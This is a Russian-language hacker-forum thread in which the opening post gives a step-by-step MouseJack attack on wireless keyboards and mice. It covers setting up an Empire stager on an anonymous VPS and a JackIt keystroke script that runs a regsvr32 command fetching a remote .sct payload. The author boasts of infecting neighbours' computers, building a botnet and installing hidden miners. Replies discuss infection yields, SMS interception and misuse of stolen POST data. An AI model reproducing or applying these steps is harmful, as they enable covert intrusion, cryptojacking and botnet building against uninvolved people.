ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Беспроводные технологии/Wi-Fi/Wardriving (https://forum.antichat.xyz/forumdisplay.php?f=113)
-   -   Необычные Методы Анализа Беспроводных Систем с NRF24 и SDR (https://forum.antichat.xyz/showthread.php?t=559756)

Ondrik8 08.06.2017 19:41

"А не написать ли мне статью?" Ходил я с этими мыслями три дня и четыре ночи с ней спал .... Авось кто нить прочитает да и дополнит чем нибудь дельным.... Эх оглянувшись на все, думаю все же напишу-ка))

Этот взлом не раз описывался в бурж-нете да и на хабре была статья но все же интересно пройти через все невзгоды самому и подробно описать так сказать весь процесс создания этой атаки.

Вы спросите а нах нам еще про это читать когда все и так уже описано не раз и по русски, нет, отвечу я вам, методика мне показалось очень актуальной и не умрет, а наоборот будет цвести и пахнуть с прогрессом что нам и на руку!

И так поехали нам понадобится VPS на базе убунту или дебиан что в принципе одно и тоже с внешним айпи адресом желательно где нить в Гватемале!)) или в любой другой стране Тайвань, в идеале там где обитают попуасы которые про Россию слышали только раз в жизни и то не помнят где и от кого!))) Ну это о анонимности, мы же занимаемся не благим делом. ДА!? Сетевые разбойники......

Ноутбук, нетбук с не убитым аккумулятором, а то будет конец фильма на самом интересном месте, кто смотрел "жулиану" в 90-ых тот меня поймет или "просто Мария" да.. Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...

О главном опишу два варианта бюджетный и дорогой начну с первого покупаем на али вот эту стоит всего 5 баксов доставка быстрая продавашка вроде шустренько все отправляет!

Получили, прекрасно нужно будет припаять к нему антенну для большего радиуса действия вот как здесь в итоге должно получится вот так Антену можно любую на 2.4 Ггц подойдет от вайфай адаптера роутера и т.д. они тоже на этих частотах работают в основном есть конечно же и на 5Ггц вайфай но в наших широтах он встречается редко...

Далее идем на наш (Гватемальский) ВПС и устанавливаем софт, а именно нынче в тренде EMPIRE и сервис Apache2 который устанавливается простой командой:sudo apt-get install apache2 ну и запускаем его! sudo service apache2 start и еще очень важный момент устанавливаем утилиту SCREEN она предназначена для того чтобы запущенный процесс, скрипт не закрывался когда вы покидаете окно терминала управления вашим ВПС (то есть работал сутками) без Вашего присутствия это очень важный момент!

Итак идем в папку с empire устанавливаем и запускаем утилиту screen командой screen -S empire (создастся новая вкладка для него чтобы он фурычил без Вас)запускаем ./empire создаем: usestager windows/launcher_sct на мой взгляд он самый без палевный в данный момент командой INFO (маленькими) узнаем его настройки в строке OutFile вбиваем путь до сервиса апач /var/www/html/ название файла.sct настраиваем Listener подробно оставаться на этом не буду на борде много инфы на эту тему запуск, установка и т.д. по желанию можно настроить autorun persistence что бы Ваш зверек оставался в (вражеской)системе подольше)) описано здесь нажимаем CNTRL+A и D закрывая этим самым вкладку с empire . Идем домой на родной раб. стол подклчаем наш девайс-донгл качаем для него утилиту отсюда устанавливаем ! В папке с Jackit есть файлик pspwn открываем его в leafpad-e все стираем и пишем (ох сколько я часов потратил на все это что бы понять что туда писать)

Код:


Код:

GUI r
DELAY 1000      ждем 1000 мл.сек
WIN STRING r    запускается run
DELAY 300          ждет (так как машины не у всех быстрые, покааа сообразит))
SHIFT ALT          меняется раскладка клавиатуры т.к. у всех по умолч. стоит русская
DELAY 300
STRING regsvr32 /s /n /u /i:http://(IP-вашего ВПС)/(имя файла которого мы создали в empire).sct scrobj.dll  << самый вкусный процесс в run печатается этот текст)))
ENTER   
DELAY 400
STRING exit        ну Вы поняли..
ENTER

Сохраняем запускаем скрипт jackit командой : ./jackit.py --script pspwn
ждем... Мне лично долго ждать не пришлось дело было вечером выходной много-этажка... поймал 4 -ех мышей запустил атаку 3 машины попались!)) поднялся на пару этажей выше еще парочка из 5 попались зашел на ВПС а там уже почти БОТНЕТ))) закинул скрытые майнеры пожинаю плоды, по двору правда еще не гулял...

Прошла неделя.... Я задался вопросом "так почему же ловит к примеру 5-6 мышей а заражается 2-3 машины?" Думаю Вы уже догадались что у нас в продаже идут (радио) мышки отдельно от клавиатуры и я нашел ответ как заставить вражеский курсор набирать на экранной клавиатуре (наш) текст в run powershell ... об этом позже, уже понадобится hackrf , GNUradio это есть дорогой вариант исполнения загрузки пэйлода

Для эффективности сего пред ставленого Вам метода можно еще прикупить усилитель на 2.4Ghz дабы покрыть все радио мыши в районе данный девайс уже спешит ко мне из Китая как приедет отпишу эффективность

ПС: моя первая статья, просьба сильно ногами не пинать меня т.к. за сочинения в школе у меня были двойки((( Простите за ВОДУ в начале! и продолжение следует так у меня в арсенале еще имеется PROXMARK, HACKRF-one и много чего еще интересного ..

Vander 08.06.2017 20:00

Вот крутая статья, правда

Цитата:


Ondrik8 сказал(а):

Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...


Тут, вообще проникся)))

Не затягивай с продолжением...

OMiay 09.06.2017 11:48

А как это выглядит на стороне жертвы? Сидит такой чел, шпилит в танки, а тут бах, игра сворачивается, открывается powershell и пишется какой-то странный код?

Ondrik8 09.06.2017 12:42

Цитата:


OMiay сказал(а):

А как это выглядит на стороне жертвы? Сидит такой чел, шпилит в танки, а тут бах, игра сворачивается, открывается powershell и пишется какой-то странный код?


на счет танков не знаю.. но из рабочего стола точно прокатывает! По времени все происходит за секунды
можно модифицировать поэйлод вверху добавить команду на сворачивания игр , приложений!

Ondrik8 09.06.2017 15:53

Цитата:


antonchik сказал(а):

Статья супер. А вот ваши примочки в единый реестр нотификаций о характеристиках шифровальных (криптографических) средств и товаров, их содержащих случайно не попадут?


я думаю что нет! Вы представьте себе как взбунтуются любители радиоуправляемых гаджетов, например квадрокоптеров ..

Сергей Попов 09.06.2017 19:03

Цитата:


Inject0r сказал(а):

крутая статья, пиши еще, желательно со скринами)


Продолжение

Ondrik8 10.06.2017 09:46

Цитата:


CyanFox сказал(а):

А с БТ мышами/клавами есть способ хакинга? Там вроде шифрование, нет?


есть, способы! и не один! БТ-интересный протокол помню случай был ауди ку-5 по БТ даже открывали.. из техники нужен только ноут с БТ , Кали а лучше Попугай, софт из github.com

Breed 27.06.2017 23:42

Цитата:


Ondrik8 сказал(а):

Кали а лучше Попугай


А можно уточнить: предпочтение Парроту отдано из-за бОльшего функционала или он более заточен под описываемые цели?
Я только собираюсь поэкспериментировать с ним (пока что в ВМ), но обратил внимание, что его аппетиты на ресурсы чуть меньше.

Ondrik8 27.06.2017 23:49

Цитата:


Brib сказал(а):

А можно уточнить: предпочтение Парроту отдано из-за бОльшего функционала или он более заточен под описываемые цели?
Я только собираюсь поэкспериментировать с ним (пока что в ВМ), но обратил внимание, что его аппетиты на ресурсы чуть меньше.


да меньше жрет ресурсов из-за оболочки "мате" я про бывал и на кали и с попугаем полет хороший, функционал у него больше просто потому что инструментов больше ...

Ondrik8 14.07.2017 10:29

получится просто снифер но с мышками на 23-26мгц

Ondrik8 02.09.2017 13:37

Цитата:


Alizonjohn сказал(а):

Всем привет! Тоже проблема: при установке nrf-research-firmware. Команда make выполняется нормально. А следующая команда:
sudo make install возвращает ошибку:

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2017-09-02 16:55:16.263] Looking for a compatible device that can jump to the Nordic bootloader
[2017-09-02 16:55:16.290] Looking for a device running the Nordic bootloader
[2017-09-02 16:55:17.293] No compatbile device found
Traceback (most recent call last):
File "./prog/usb-flasher/usb-flash.py", line 92, in
raise Exception('No compatible device found.')
Exception: No compatible device found.
Makefile:27: recipe for target 'install' failed
make: *** [install] Error 1

Для процесса использую Ubuntu 16.04 LTS десктопную.
Судя по надписи No compatbile device found проблема в самом устройстве. Вот и возник вопрос: у меня устройство nRF21LU1 (без плюсика). А на гитхабе идет разговор про nRF24LU1+

Как думаете, в этом различии может быть дело?


https://forum.antichat.xyz/attachmen...eb889c3ab1.png

Ondrik8 02.09.2017 14:30

Цитата:


Alizonjohn сказал(а):

Может сам донгл косячный


я думаю нет, не косячный! А вообще приходится всегда после атаки высунь\всунь донгл.))

fysh 08.09.2017 15:31

Цитата:


Alizonjohn сказал(а):

Все, разобрался. Эти донглы бывают разными. Вот обсуждение https://github.com/BastilleResearch/mousejack/issues/6

Если не трудно подскажи как решил данный вопрос?....у меня аналогичная проблема
Dongl детектися, как "мышкоу".
Bus 005 Device 003: ID 1915:000c Nordic Semiconductor ASA
0003:1915:000C.0003: input,hidraw0: USB HID v1.11 Mouse [Weistech Weistech Wireless Desktop] on usb-0000:00:1d.3-1/input0

Поправил в исходниках как описано в обсуждении, испробовал несколько вариантов но, все впустую....resource is busy получаю при install

Заранее спасибо.

cathome 02.12.2017 22:26

Так, эта штука перехватывает канал беспроводных мышек/клав и вбивает что прописано в команде, а именно подключается к ботнет-серверу
Я правильно понял?

swap3r 02.12.2017 22:52

эта штука позволяет "посылать" нажатия клавиш через радиоинтерфейс таким образом, что компьютер думает, что эти нажатия посылает легитимная радиоклава подключенная к нему. Что позволяет запускать свои команды на чужом компьютере, и, при необходимости, строить "ботнет" из таких компьютеров.

cathome 02.12.2017 22:59

Цитата:


swap3r сказал(а):

эта штука позволяет "посылать" нажатия клавиш через радиоинтерфейс таким образом, что компьютер думает, что эти нажатия посылает легитимная радиоклава подключенная к нему. Что позволяет запускать свои команды на чужом компьютере, и, при необходимости, строить "ботнет" из таких компьютеров.


Благодарю за ответ, с мышкой также сработает?
В плане перехватит радиосигнал мышки и подключиться как клавиатура?

swap3r 03.12.2017 15:33

Цитата:


cathome сказал(а):

Благодарю за ответ, с мышкой также сработает?
В плане перехватит радиосигнал мышки и подключиться как клавиатура?


судя по написанному, то должно сработать, что есть весьма хорошо.
сам не тестил - жду платку от наших узкоглазых таварисчей...

Ondrik8 03.12.2017 15:41

сработает и с мышкой но hackrf нужен.. и нужно знать какую винду атакуешь и размер экрана жертвы отрепетировать и записать нажатия мышкой на экранной клаве вызов мышкой беспроводной клавиатуры вызвать cmd.exe затем путь к бэкдору и его последующий запуск))

swap3r 03.12.2017 15:47

Цитата:


Ondrik8 сказал(а):

сработает и с мышкой но hackrf нужен.. и нужно знать какую винду атакуешь и размер экрана жертвы отрепетировать и записать нажатия мышкой на экранной клаве вызов мышкой беспроводной клавиатуры вызвать cmd.exe затем путь к бэкдору и его последующий запуск))


Ondrik8, может я не так вопрос понял немного. Я имел в виду следующее: есть беспроводная мышка, приемник воткнут в юсб порт ноутбука, кто-то подключается к этому приемнику (от мышки) и отправляет туда команды нажатия клавиш на клавиатуре. То есть, приемник от мышки, получается, стает приемником для клавиатуры. Я точно не уверен, можно ли так, но судя по тому, что читал об этом, то там приемник унифицирован и для мышей и для комплектов клавомышь, и должно получиться.
Что скажешь?

Ondrik8 03.12.2017 15:55

не правильно понял, есть же просто мыши (мяу) а есть мыши с клавами, так вот данный чип подходит только с клавами а hackrf только для мышей... надеюсь Бро понятно обьянсил?))
если что пиши в жабку мне обсудим.. но потом сцука гребаный offline

swap3r 03.12.2017 19:24

понял, спасибо

NSNL.dll 03.02.2018 17:40

Эх, тема отличная, но только вот у меня тут 20К+ человек живёт и чтобы сработало придётся изрядно так походить. Как думаете, стоит ли пытаться?

pr0phet 06.04.2018 08:13

Подскажите, нужно взять ардуину и отдельно модуль NRF24 к нему? Нет готового собранного девайся с данным чипом, типа как SDR тюнер?
Ссылка на "вещЪ" со статьи не работает.

animi 16.05.2018 21:32

Привет. После повторного запуска python ругается на таймаут, понимаю что он не может подключится с свистку. Как с этим бороться?

ghost 17.05.2018 11:25

Цитата:


p.r0phe.t сказал(а):

Подскажите, нужно взять ардуину и отдельно модуль NRF24 к нему? Нет готового собранного девайся с данным чипом, типа как SDR тюнер?
Ссылка на "вещЪ" со статьи не работает.


Поиск на али по запросу "NRF24LU1" ничего не дал?

animi 12.06.2018 12:49

Всем привет.
Подскажите в чем может быть проблема.
Купил на aliexpress crazyradio за 600 руб. (на сколько оно настоящее фиг знает) и купил xq-02a за 1500 руб.

https://forum.antichat.xyz/attachmen...8612130822.png

https://forum.antichat.xyz/attachmen...8612132824.png

Прошил донгл по инструкции BastilleResearch/nrf-research-firmware.
До пунктаFlash over USB (до прошивки 1915:7777 после прошивки 1915:0102) понимаю что все норм.

Дальше подключаю crazyradio к samsung note 3 смотрю lsusb

Bus 001 Device 005: ID 1915:0102 Nordic Semiconductor ASA

устройство видно и работает. Но бяда я почти ни кого не вижу.
Прошел по району нашел только 7 устройств (всего 7 карл (((( ).

В место штатной антенны размером 5 см прикрутил антенну на 8db, результат не изменился, следующая антенна 12db (тоже самое). Попробовал направленную yagi 16db вообще ни кого не вижу.

Перечитал данный пост, решил все за экранировать.

https://forum.antichat.xyz/attachmen...8612131037.png

обмотал все черной изолентой, а поверх нее медную фольгу и еще изоленты.
Результат

https://forum.antichat.xyz/attachmen...8612131442.png

2,5 слоя фольги.

Снова все подключил и пошел гулять. Результат получился тот же.

Что я делаю не так? можно ли как то замерить чувствительность этой сборки?

Решил присоединить xq-02a. Вроде все работает, но результата я не вижу совсем(((

https://forum.antichat.xyz/attachmen...8612133135.png

Решил данный усилитель проверить на wi-fi с альфой. До подключения усилителя видел 20-30 штук сетей, после 3 ((((((((((.
Понимаю что он должен плохо видеть ближайшие сети, но удаленные сети должен видеть. А тут вблизи ни фига ни на дальние расстояния тоже самое.

Вопросы:
Нужно ли делать экранирование донгла?
Как можно замерять чувствительность устройства?
Подключаю к Raspberry, первый запуск норм, останавливаю скрипт jackit запускаю повторно пишет что устройство занято. это норм? На телефоне все ок., сколько бы не перезапускал все работает.

Как протестить этот усилитель? (Делаем Wi-Fi усилитель на 2,4 Ггц - Самодельный Wi-Fi Усилитель) Пишет прям отлично работает у меня вообще не работает.

Гулял по городу с этой сборкой пару дней. Результат прям удручает максимум 8 устройств находил. Может не так прошил или нужно не jackit использовать?

Сборка:
- crazyradio
- samsung galaxy note 3
- iphone 5
1 Вариант: кидаю в сумку note 3 к нему crazyradio антенна на 8 или 12 db Y-кабель с доп питанием ( и без тестил). Поднимаю точку доступа на note 3, подключаюсь с iphone, захожу по ssh.
2 Вариант: note 3 к нему crazyradio антенна на 8 db.( в этот момент похож на охотника за приведениями )))) ).

думал может точка доступа перекрывает, но разницы не заметил.

~localhost 12.06.2018 21:15

Как написанно на хабре через малину не кто не пробывал,?
есть вопросы у меня))

animi 12.06.2018 22:31

я через нее пробовал.
Как то странно работает. если на пару часов оставить вроде видет

KEY ADDRESS CHANNELS COUNT SEEN TYPE PACKET
----- -------------- ---------- ------- ----------- ------- -----------------------------------------------------------
1 5A6:A9:52:B1 54 1 1:08:49 ago Unknown CD:7C:2E:7A4:72:A5:7A:A3B:6A6:2C:48:A9:57:542
2 BA:55:AA:AE:8A 79 1 1:01:31 ago Unknown 05:54:8E:07:EF:ED:B2:61:51:6F:12:B5:A0:19:1E:B5:A5 :F6:C5
4 A8:8A:24:CC:94 74 1 0:41:41 ago Unknown 95:22:44:4B:89:54:41:0D:5A:22:A6:BB:35:2C:24:BA:92 :72:99:24
3 A5:B9:98:90:96 14 1 0:50:27 ago Unknown 6C:46:A1:15:44:5A:2C

~localhost 28.06.2018 20:57

Не могу установить jackit. помогите

Код:


Код:

root:~# cd jackit/
root:~/jackit# ls
bin  build  examples  jackit  README.md  requirements.txt  setup.py  tox.ini
root:~/jackit# ./setup.py install
/usr/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'install_requires'
  warnings.warn(msg)
running install
running build
running build_py
running build_scripts
running install_lib
running install_scripts
changing mode of /usr/local/bin/jackit to 755
running install_egg_info
Removing /usr/local/lib/python2.7/dist-packages/JackIt-0.1.0.egg-info
Writing /usr/local/lib/python2.7/dist-packages/JackIt-0.1.0.egg-info
root:~/jackit#

Делал все не так, но теперь вроде делаю все правльно но все же ошибки

Код:


Код:

pip install -e .
Obtaining file:///root/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Requirement already satisfied: pyusb==1.0.0 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (1.0.0)
Requirement already satisfied: tabulate==0.7.5 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (0.7.5)
Requirement already satisfied: six==1.10.0 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (1.10.0)
requests 2.18.4 has requirement urllib3=1.21.1, but you'll have urllib3 1.23 which is incompatible.
Installing collected packages: JackIt
  Found existing installation: JackIt 0.1.0
Cannot uninstall 'JackIt'. It is a distutils installed project and thus we cannot accurately determine which files belong to it which would lead to only a partial uninstall.


InetTester 28.03.2019 02:38

Если я верно понимаю то данный модуль nrf24 можно заставить работать как полноценный wifi адаптер или bluetooth? Естественно предварительно прошив его.
Т.е это своего рода SDR адаптер который работает в очень узком диапазоне?

Петручо 20.11.2019 20:44

вижу на али есть crazyradio донглы по 600 рублей и по 3 тыс . вторые с антенной .
чем они отличаются кроме антенны и цены ? в дешевых чувствительность слабая ?
и кто провабол , примерно сколько собирают ботов с многоэтажки например этажей в 9 или 16 ?

и еще вопрос - дорогой вариант по эффективности намного лучше чем дешевый ?
hackrf купить не проблема . но пишут что gnuradio заморочена . хотя если выхлоп с нее будет , то освоить ее стоит.

InetTester 21.11.2019 19:52

Отличаются практически ничем(я бегло используя разницу не заметил), юзаю китайский уже около года.
Сегодня набравшись смелости скажу что вещь по большей своей части уже бестолковая, так как все серьезные(и не только) производители используют хопинг, т.е ты просто не успеешь переключатся между всеми каналами, ну или хакать только 'динозавров' 2010 года которые уже мало у кого имеются.
Если есть выбор/деньги то бери Hackrf(есть уже и более интересные девайсы) ибо эти вещи сравнивать даже нельзя, он как швейцарский нож, теоретически сможешь захватить весь спектр и потом уже дома спокойно его анализировать.

Петручо 21.11.2019 21:27

на hackrf почитав уже и рассчитываю , но много много вопросов , тоже читал про что узявимость исправили пару лет назад в большинстве беспроводных клав и мышей . но у народа еще куча старых , так что интересует пробив .
и не подскажешь , через hackrf новые перехватывать может ? как я понял такие вендоры как логитек и ему подобные уже и шифровку включили . это обойти можно или даже с hackrf только нешифрованные каналы ?

InetTester 21.11.2019 22:50

Здесь еще речь даже не дошла до шифрования, у тебя просто не получиться получить все данные c помощью crazyradio, так как ты не знаешь какой канал будет следующим, а с hackrf ты просто будешь снифать всю полосу, и уже потом сможешь 'извлечь' нужные тебе данные(я очень приблизительно описал сейчас)

Петручо 22.11.2019 16:35

то что crazyradio не даст перехватить скачка частот и работать еще и по чисто мышкам (без клавиатуры) я понял .
но там описан софт , в случае с hackrf только упомянули gnuradio, как там дальше даже намека не дали , хотелось уточнить что делать с ним и есть ли еще дополнительный софт . ну еще вопрос по покупке hackrf , там несколько вариантов покупки , просто плата hackrf и бандлы с антеннами и кабелями , есть смысл в тех антеннах и корпусах ?
или можно купить просто плату , у ней усилитель что в статье , там 2.4ггц антенна уже в комплекте (да и есть 5dbi антенна от вайфайки) .
и в бандле заметил еще антенну от gsm/3G/LTE .
то что она может перехватить сигнал я понял , а вот расшифровать его возможно ? голос пока не интересует , а вот смс и интернет пакеты даже очень .

gajam 24.11.2019 12:36

у меня с web cruiser остались post данные, как ими можно воспользоватся, мне нужны быза емейлов

Петручо 23.12.2019 07:48

читал не раз что hackrf не самая мощная по возможностям карта (она не дуплексная), что есть еще мощнее чем hackrf ?
кто нибудь щупал bladerf 2.0 , по частотам как hackrf и она емнип полный дуплекс.
больше интересует поддержка софта , по до что софта больше ?
и можно ли через hackrf пехеватывать СМС , разговоры не интересуют


Время: 23:43